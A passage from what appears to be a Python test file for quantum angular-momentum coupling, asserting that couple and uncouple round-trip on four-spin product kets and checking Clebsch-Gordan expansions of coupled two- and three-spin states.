JzKet(S.Half, S.Half),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(S.Half, Rational(-1, 2)),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(S.Half, S.Half),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(S.Half, Rational(-1, 2)),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(S.Half, S.Half),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(S.Half, Rational(-1, 2)),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(S.Half, S.Half),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(S.Half, Rational(-1, 2)),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 1),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 1),
JzKet(S.Half, S.Half),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 1),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 1),
JzKet(S.Half, Rational(-1, 2)),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(S.Half, S.Half),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(S.Half, Rational(-1, 2)),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(S.Half, S.Half),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(S.Half, Rational(-1, 2)),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(S.Half, S.Half),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(S.Half, Rational(-1, 2)),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(S.Half, S.Half),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(S.Half, Rational(-1, 2)),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(S.Half, S.Half),
)
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(S.Half, Rational(-1, 2)),
)
)
)
)
# Couple j1+j3=j13, j2+j4=j24, j13+j24=j
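    # Here ((1, 3), (2, 4), (1, 2)) couples spaces 1 and 3, then spaces 2 and 4,
    # and finally the two intermediate results, as named in the comment above.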
# j1=1/2, j2=1/2, j3=1/2, j4=1/2
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
# j1=1/2, j2=1/2, j3=1, j4=1/2
assert TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(S.Half, S.Half)
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(1, 1),
JzKet(S.Half, S.Half),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(1, 1),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(1, 1),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(S.Half, S.Half)
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(S.Half, S.Half),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(S.Half, S.Half),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(S.Half, S.Half),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(S.Half, S.Half),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(S.Half, S.Half),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 1),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 1),
JzKet(S.Half, S.Half),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 1),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 1),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(S.Half, S.Half),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(S.Half, S.Half),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(S.Half, S.Half),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(S.Half, S.Half),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(S.Half, S.Half),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(S.Half, S.Half),
),
((1, 3), (2, 4), (1, 2)),
)
)
)
assert TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(S.Half, Rational(-1, 2)),
) == expand(
uncouple(
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 3), (2, 4), (1, 2)),
)
)
)


def test_uncouple_2_coupled_states_numerical():
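    # These spell out the Clebsch-Gordan expansions of coupled states in the
    # uncoupled product basis, e.g. the two-spin-1/2 singlet and triplet states.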
# j1=1/2, j2=1/2
assert (
uncouple(JzKetCoupled(0, 0, (S.Half, S.Half)))
== sqrt(2)
* TensorProduct(JzKet(S.Half, S.Half), JzKet(S.Half, Rational(-1, 2)))
/ 2
- sqrt(2)
* TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, S.Half))
/ 2
)
assert uncouple(JzKetCoupled(1, 1, (S.Half, S.Half))) == TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half)
)
assert (
uncouple(JzKetCoupled(1, 0, (S.Half, S.Half)))
== sqrt(2)
* TensorProduct(JzKet(S.Half, S.Half), JzKet(S.Half, Rational(-1, 2)))
/ 2
+ sqrt(2)
* TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, S.Half))
/ 2
)
assert uncouple(JzKetCoupled(1, -1, (S.Half, S.Half))) == TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, Rational(-1, 2))
)
# j1=1, j2=1/2
assert (
uncouple(JzKetCoupled(S.Half, S.Half, (1, S.Half)))
== -sqrt(3) * TensorProduct(JzKet(1, 0), JzKet(S.Half, S.Half)) / 3
+ sqrt(6) * TensorProduct(JzKet(1, 1), JzKet(S.Half, Rational(-1, 2))) / 3
)
assert (
uncouple(JzKetCoupled(S.Half, Rational(-1, 2), (1, S.Half)))
== sqrt(3) * TensorProduct(JzKet(1, 0), JzKet(S.Half, Rational(-1, 2))) / 3
- sqrt(6) * TensorProduct(JzKet(1, -1), JzKet(S.Half, S.Half)) / 3
)
assert uncouple(
JzKetCoupled(Rational(3, 2), Rational(3, 2), (1, S.Half))
) == TensorProduct(JzKet(1, 1), JzKet(S.Half, S.Half))
assert (
uncouple(JzKetCoupled(Rational(3, 2), S.Half, (1, S.Half)))
== sqrt(3) * TensorProduct(JzKet(1, 1), JzKet(S.Half, Rational(-1, 2))) / 3
+ sqrt(6) * TensorProduct(JzKet(1, 0), JzKet(S.Half, S.Half)) / 3
)
assert (
uncouple(JzKetCoupled(Rational(3, 2), Rational(-1, 2), (1, S.Half)))
== sqrt(6) * TensorProduct(JzKet(1, 0), JzKet(S.Half, Rational(-1, 2))) / 3
+ sqrt(3) * TensorProduct(JzKet(1, -1), JzKet(S.Half, S.Half)) / 3
)
assert uncouple(
JzKetCoupled(Rational(3, 2), Rational(-3, 2), (1, S.Half))
) == TensorProduct(JzKet(1, -1), JzKet(S.Half, Rational(-1, 2)))
# j1=1, j2=1
assert (
uncouple(JzKetCoupled(0, 0, (1, 1)))
== sqrt(3) * TensorProduct(JzKet(1, 1), JzKet(1, -1)) / 3
- sqrt(3) * TensorProduct(JzKet(1, 0), JzKet(1, 0)) / 3
+ sqrt(3) * TensorProduct(JzKet(1, -1), JzKet(1, 1)) / 3
)
assert (
uncouple(JzKetCoupled(1, 1, (1, 1)))
== sqrt(2) * TensorProduct(JzKet(1, 1), JzKet(1, 0)) / 2
- sqrt(2) * TensorProduct(JzKet(1, 0), JzKet(1, 1)) / 2
)
assert (
uncouple(JzKetCoupled(1, 0, (1, 1)))
== sqrt(2) * TensorProduct(JzKet(1, 1), JzKet(1, -1)) / 2
- sqrt(2) * TensorProduct(JzKet(1, -1), JzKet(1, 1)) / 2
)
assert (
uncouple(JzKetCoupled(1, -1, (1, 1)))
== sqrt(2) * TensorProduct(JzKet(1, 0), JzKet(1, -1)) / 2
- sqrt(2) * TensorProduct(JzKet(1, -1), JzKet(1, 0)) / 2
)
assert uncouple(JzKetCoupled(2, 2, (1, 1))) == TensorProduct(
JzKet(1, 1), JzKet(1, 1)
)
assert (
uncouple(JzKetCoupled(2, 1, (1, 1)))
== sqrt(2) * TensorProduct(JzKet(1, 1), JzKet(1, 0)) / 2
+ sqrt(2) * TensorProduct(JzKet(1, 0), JzKet(1, 1)) / 2
)
assert (
uncouple(JzKetCoupled(2, 0, (1, 1)))
== sqrt(6) * TensorProduct(JzKet(1, 1), JzKet(1, -1)) / 6
+ sqrt(6) * TensorProduct(JzKet(1, 0), JzKet(1, 0)) / 3
+ sqrt(6) * TensorProduct(JzKet(1, -1), JzKet(1, 1)) / 6
)
assert (
uncouple(JzKetCoupled(2, -1, (1, 1)))
== sqrt(2) * TensorProduct(JzKet(1, 0), JzKet(1, -1)) / 2
+ sqrt(2) * TensorProduct(JzKet(1, -1), JzKet(1, 0)) / 2
)
assert uncouple(JzKetCoupled(2, -2, (1, 1))) == TensorProduct(
JzKet(1, -1), JzKet(1, -1)
)


def test_uncouple_3_coupled_states_numerical():
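    # Same idea for three coupled spins: stretched states (|m| = j) uncouple to
    # a single product ket, the rest to Clebsch-Gordan weighted sums.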
# Default coupling
# j1=1/2, j2=1/2, j3=1/2
assert uncouple(
JzKetCoupled(Rational(3, 2), Rational(3, 2), (S.Half, S.Half, S.Half))
) == TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(S.Half, S.Half)
)
assert (
uncouple(JzKetCoupled(Rational(3, 2), S.Half, (S.Half, S.Half, S.Half)))
== sqrt(3)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, S.Half), JzKet(S.Half, S.Half)
)
/ 3
+ sqrt(3)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, S.Half)
)
/ 3
+ sqrt(3)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(S.Half, Rational(-1, 2))
)
/ 3
)
assert (
uncouple(
JzKetCoupled(Rational(3, 2), Rational(-1, 2), (S.Half, S.Half, S.Half))
)
== sqrt(3)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
)
/ 3
+ sqrt(3)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
)
/ 3
+ sqrt(3)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
)
/ 3
)
assert uncouple(
